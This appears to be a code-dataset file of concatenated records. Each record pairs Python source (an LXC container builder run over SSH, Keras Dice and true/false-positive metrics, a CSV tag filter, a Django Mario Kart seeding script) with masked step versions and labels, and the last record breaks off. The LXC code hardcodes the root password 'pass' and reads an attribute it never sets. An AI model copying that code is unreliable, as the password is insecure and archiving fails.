print "\nInstalling services..."
section = self.data.getSection("services")
self.installPrograms(section)
def setupDeveloperTools(self):
print "\nInstalling developer tools..."
section = self.data.getSection("devel")
self.installPrograms(section)
def setupGuiTools(self):
print "\nInstalling GUI tools..."
section = self.data.getSection("gui")
self.installPrograms(section)
def createArchive(self):
executeCommandSSH("cd " + path)
files = self.config + " " + self.fstab + " " + self.rootfs
arch_name = self.id + ".zip"
executeCommandSSH("zip -r " + arch_name + " " + files)
copyFileFromVM(path + "/" + arch_name, "./", self.host)
return [arch_name, ""]
def getModuleName(self):
return "lxc"
def getConfigInstance(self):
return ConfigLinux(self.data, self.communicator)
def getInstallerInstance(self):
vm_os = self.data.getSection("hardware").get("os")
for k in installer.keys():
if str(k) in vm_os:
return installer[k](self.communicator)
return None
|
normal
|
{
"blob_id": "22fe07a237f2c5f531d189c07596a22df191d038",
"index": 1140,
"step-1": "from vmgCommanderBase import CommanderBase\nfrom vmgInstallerApt import InstallerApt\nfrom vmgInstallerYum import InstallerYum\nfrom vmgConfigLinux import ConfigLinux\nfrom runCommands import *\nimport shutil\nimport os\nimport time\nfrom vmgLogging import *\nfrom writeFormat import *\nfrom vmgControlVmware import *\nfrom vmgUtils import *\n\n\"\"\" Functions to write lines in a .vmx file. \"\"\"\nlog = logging.getLogger(\"vmgen.vmgCommanderLxc\")\n\n\"\"\"\tThe distribution used for container creation parameters. \"\"\"\ndistro = {\n\t\"debian\":{\n\t\t\"vm\":\"/home/vmgen/vmware/Debian (lxc)/Debian (lxc).vmx\",\n\t\t\"hostname\":\"root@debian-lxc\",\n\t\t\"script\":\"my-lxc-debian.sh\",\n\t\t\"scripts-folder\":\"../scripts-lxc/debian/\"},\n\t\"fedora\":{\n\t\t\"vm\":\"/home/vmgen/vmware/Fedora 64-bit/Fedora 64-bit.vmx\",\n\t\t\"hostname\":\"root@fedora-lxc\",\n\t\t\"script\":\"my-lxc-fedora.sh\",\n\t\t\"scripts-folder\":\"../scripts-lxc/fedora/\"}\n}\n\ninstaller = {\n\t'debian' : InstallerApt,\n\t'ubuntu' : InstallerApt,\n\t'fedora' : InstallerYum\n}\n\n\"\"\" Container operating system parameters. \"\"\"\nos_params = {\n\t\t\"fedora-64\":{\n\t\t\t\"os\":\"fedora\",\n\t\t\t\"version\":\"14\", \n\t\t\t\"arch\":\"amd64\"},\n\t\t\"fedora\":{\n\t\t\t\"os\":\"fedora\",\n\t\t\t\"version\":\"14\", \n\t\t\t\"arch\":\"x86\"},\n\t\t\"debian5-64\":{\n\t\t\t\"os\":\"debian\",\n\t\t\t\"version\":\"lenny\", \n\t\t\t\"arch\":\"amd64\"},\n\t\t\"debian5\":{\n\t\t\t\"os\":\"debian\",\n\t\t\t\"version\":\"lenny\", \n\t\t\t\"arch\":\"x86\"},\n}\n\n\"\"\"\tThe path in the VMware machine where the container is created. \"\"\"\npath = \"/lxc\"\n\nclass CommanderLxc(CommanderBase):\n\n\tdef setupHardware(self):\n\t\tlog.info(\"Creating the hardware configuration...\")\n\n\t\tself.os = self.data.getSection(\"hardware\").get(\"os\")\n\t\tself.id = self.data.getSection(\"hardware\").get(\"vm_id\")\n\n\t\t# extract the os parameters from the config file\n\t\tos_type = os_params[self.os][\"os\"]\n\t\tver = os_params[self.os][\"version\"]\n\t\tarch = os_params[self.os][\"arch\"]\n\n\t\tself.vm = distro[os_type][\"vm\"]\n\t\tself.host = distro[os_type][\"hostname\"]\n\t\tfolder = distro[os_type][\"scripts-folder\"]\n\t\tscript = distro[os_type][\"script\"]\n\n\t\tself.config = path + \"/\" + self.id + \"/\" + \"config.\" + self.id\n\t\tself.roots = path + \"/\" + self.id + \"/\" + \"rootfs.\" + self.id\n\t\tself.fstab = path + \"/\" + self.id + \"/\" + \"fstab.\" + self.id\n\n\t\t# set the user and host used for the SSH connection\n\t\tsetUserHost(self.host)\n\n\t\t# power on the auxiliary VMware machine\n\t\tlog.info(\"\\tStarting the virtual machine...\")\n\t\ttry_power_on_vm(self.vm)\n\n\t\t# set default root password\n\t\tpasswd = \"pass\" \n\t\t#self.data.getSection(\"config\").get(\"root_passwd\")\n\n\t\t# copy the needed scripts to the virtual machine\n\t\tlog.info(\"\\tCopying the scripts to the virtual machine...\")\n\t\tfiles = os.listdir(folder)\n\t\tpaths = [os.path.join(folder, f) for f in files]\n\t\tcopyFilesToVM(paths, self.host)\n\t\tfor f in files:\n\t\t\texecuteCommandSSH(\"chmod a+x \" + f)\n\n\t\t# create a temp file containing lines to be appended to the container\n\t\t# config file\n\t\tlog.info(\"\\tFilling up the network section in the config file...\")\n\t\ttemp_file = \"eth.tmp\"\n\t\twith open(temp_file, \"w\") as f:\n\t\t\tlog.info(\"\\Setting memory and CPUs...\")\n\t\t\tsection = self.data.getSection(\"hardware\")\n\t\t\tram = section.get(\"ram\") + \"M\"\n\t\t\tnum_cpu = 
int(section.get(\"num_cpu\"))\n\n\t\t\tif num_cpu == 1:\n\t\t\t\tcpus = \"0\"\n\t\t\telse:\n\t\t\t\tcpus = \"0\" + \"-\" + str(num_cpu - 1)\n\n\t\t\t# TODO: the kernel needs support for the memory controller\n\t\t\twriteOption(f, \"#lxc.cgroup.memory.limit_in_bytes\", ram, False)\n\t\t\twriteOption(f, \"lxc.cgroup.cpuset.cpus\", cpus, False)\n\n\t\t\t# create network interfaces\n\t\t\tlog.info(\"\\tCreating the network interfaces...\")\n\t\t\tself.eth_list = getSortedValues(section.get(\"eths\").data)\n\t\t\teth_config = getSortedValues(\n\t\t\t\t\tself.data.getSection(\"network\").get(\"eths\").data)\n\t\t\tfor i, eth_pair in enumerate(zip(self.eth_list, eth_config)):\n\t\t\t\ti = str(i)\n\t\t\t\teth, eth_c = eth_pair\n\n\t\t\t\teth_name = eth.get(\"name\")\n\t\t\t\twriteOption(f, \"lxc.network.type\", \"veth\", False)\n\n\t\t\t\twriteOption(f, \"lxc.network.link\", \"br0\", False)\n\n\t\t\t\twriteOption(f, \"lxc.network.name\", eth_name, False)\n\t\t\t\twriteOption(f, \"lxc.network.mtu\", \"1500\", False)\n\n\t\t\t\t# set IP address\n\t\t\t\tip_type = eth_c.get(\"type\")\n\t\t\t\tif ip_type == \"static\":\n\t\t\t\t\tip = eth_c.get(\"address\")\n\t\t\t\t\tmask = getNetmaskCIDR(eth_c.get(\"network\"))\n\t\t\t\telse:\n\t\t\t\t\tip = \"0.0.0.0\"\n\t\t\t\t\tmask = \"\"\n\n\t\t\t\twriteOption(f, \"lxc.network.ipv4\", ip+mask, False)\n\n\t\t\t\tif eth.contains(\"connected\"):\n\t\t\t\t\twriteOption(f, \"lxc.network.flags\", \"up\", False)\n\n\t\t\t\t# set MAC address, if present\n\t\t\t\tmac = eth.get(\"hw_address\")\n\t\t\t\tif mac:\n\t\t\t\t\twriteOption(f, \"lxc.network.hwaddr\", mac)\n\n\t\t# copy the temp file to the virtual machine\n\t\tcopyFileToVM(temp_file, self.host)\n\t\tos.remove(temp_file)\n\n\t\t# run the script on the virtual machine, to create the container\n\t\tlog.info(\"\\tRun the container creation script...\")\n\t\texecuteCommandSSH(\"./\" + script + \" \" + path + \" \" + self.id + \" \" + \n\t\t\tver + \" \" + arch + \" \" + passwd)\n\n\n\tdef setupOperatingSystem(self):\n\t\tpass\n\t\t\n\tdef startVM(self):\n\t\t\"\"\" Start the container. \"\"\"\n\t\tlog.info(\"\\tStarting the container...\")\n\t\texecuteCommandSSH(\"pushd \" + path)\n\t\texecuteCommandSSH(\"lxc-create\" + \" -n \" + self.id + \" -f \" + self.config)\n#\t\texecuteCommandSSH(\"lxc-start\" + \" -n \" + self.id + \" -f \" + self.config)\n\n\tdef shutdownVM(self):\n\t\t\"\"\" Shutdown the container and the virtual machine. 
\"\"\"\n\t\tlog.info(\"\\tStopping the container...\")\n#\t\texecuteCommandSSH(\"lxc-stop\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"lxc-destroy\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"shutdown -h now\")\n\n\tdef connectToVM(self):\n\t\tprint \"\\nEstablishing connection to the VM...\"\n\n\tdef disconnectFromVM(self):\n\t\tprint \"\\nTerminating connection to the VM...\"\n\n\tdef setupServices(self):\n\t\tprint \"\\nInstalling services...\"\n\t\tsection = self.data.getSection(\"services\")\n\t\tself.installPrograms(section)\n\n\tdef setupDeveloperTools(self):\n\t\tprint \"\\nInstalling developer tools...\"\n\t\tsection = self.data.getSection(\"devel\")\n\t\tself.installPrograms(section)\n\n\tdef setupGuiTools(self):\n\t\tprint \"\\nInstalling GUI tools...\"\n\t\tsection = self.data.getSection(\"gui\")\n\t\tself.installPrograms(section)\n\n\tdef createArchive(self):\n\t\texecuteCommandSSH(\"cd \" + path)\n\t\tfiles = self.config + \" \" + self.fstab + \" \" + self.rootfs\n\n\t\tarch_name = self.id + \".zip\"\n\n\t\texecuteCommandSSH(\"zip -r \" + arch_name + \" \" + files)\n\t\tcopyFileFromVM(path + \"/\" + arch_name, \"./\", self.host)\n\n\t\treturn [arch_name, \"\"]\n\n\tdef getModuleName(self):\n\t\treturn \"lxc\"\n\n\tdef getConfigInstance(self):\n\t\treturn ConfigLinux(self.data, self.communicator)\n\n\tdef getInstallerInstance(self):\n\t\tvm_os = self.data.getSection(\"hardware\").get(\"os\")\n\t\tfor k in installer.keys():\n\t\t\tif str(k) in vm_os:\n\t\t\t\treturn installer[k](self.communicator)\n\t\treturn None",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Copyright (c) 2020 Hai Nguyen
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import tensorflow.keras.backend as K
def dice_coef(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2. * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
|
normal
|
{
"blob_id": "18b10a68b2707b7bfeccbd31c5d15686453b3406",
"index": 6253,
"step-1": "<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-2": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\n<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-3": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-4": "import tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-5": "# Copyright (c) 2020 Hai Nguyen\n# \n# This software is released under the MIT License.\n# https://opensource.org/licenses/MIT\n\nimport tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2. * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth) \n return tp \n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('nodes_tags.csv', 'r') as f:
tags = csv.DictReader(f)
for row in tags:
if row['key'] == 'FIXME':
pp(row)
<|reserved_special_token_1|>
import csv
from pprint import pprint as pp
with open('nodes_tags.csv', 'r') as f:
tags = csv.DictReader(f)
for row in tags:
if row['key'] == 'FIXME':
pp(row)
|
flexible
|
{
"blob_id": "d0981d279f7090d5309aa564252dba731a34a66b",
"index": 1424,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('nodes_tags.csv', 'r') as f:\n tags = csv.DictReader(f)\n for row in tags:\n if row['key'] == 'FIXME':\n pp(row)\n",
"step-3": "import csv\nfrom pprint import pprint as pp\nwith open('nodes_tags.csv', 'r') as f:\n tags = csv.DictReader(f)\n for row in tags:\n if row['key'] == 'FIXME':\n pp(row)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')
<|reserved_special_token_0|>
django.setup()
<|reserved_special_token_0|>
for char in char_names:
index = x - y + 1
name = char_names[x]
if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:
y += 1
index = None
new_char = Character(name=char_names[x], image_url=char_urls[x], index=
index)
new_char.save()
x += 1
<|reserved_special_token_0|>
for tire in tire_names:
index = x + 1
new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)
new_tire.save()
x += 1
<|reserved_special_token_0|>
for car in car_names:
index = x + 1
new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)
new_car.save()
x += 1
<|reserved_special_token_0|>
for glider in glider_names:
index = x + 1
new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],
index=index)
new_glider.save()
x += 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')
<|reserved_special_token_0|>
django.setup()
<|reserved_special_token_0|>
char_names = ['Mario', 'Luigi', 'Peach', 'Daisy', 'Rosalina',
'Mario Tanooki', 'Peach cat', 'Yoshi', 'Yoshi (LBlue)', 'Yoshi (Black)',
'Yoshi (Rose)', 'Yoshi (Yellow)', 'Yoshi (White)', 'Yoshi (Blue)',
'Yoshi (Rose)', 'Yoshi (Orange)', 'Toad', 'Koopa', 'Shyguy',
'Shyguy (LB)', 'Shyguy (Black)', 'Shyguy (Rose)', 'Shyguy (Yellow)',
'Shyguy (White)', 'Shyguy (Blue)', 'Shyguy (Rose)', 'Shyguy (Orange)',
'Lakitu', 'Toadette', 'Boo', 'Baby Mario', 'Baby Luigi', 'Baby Peach',
'Baby Daisy', 'Baby Rosalina', 'Metal Mario', 'Golden Mario',
'Golden Peach', 'Wario', 'Waluigi', 'Donkey Kong', 'Bowser', 'Skelerex',
'Bowser Jr', 'Dry Bowser', 'Lemmy', 'Larry', 'Wendy', 'Ludwig', 'Iggy',
'Roy', 'Morton', 'Inkling (G)', 'Inkling (B)', 'Link (SSBU)',
'Link (BOTW)', 'Villager (B)', 'Villager(G)', 'Mary']
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr'
, 'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr'
,
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png'
,
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png'
,
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809'
, 'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr'
,
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr'
,
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr'
,
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png'
,
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png'
,
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr'
,
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo'
,
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png'
,
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM'
,
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ'
,
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708'
,
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649'
,
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910'
,
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014'
,
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222'
,
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png'
,
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png'
,
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117'
, 'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323'
,
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8'
, 'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141'
,
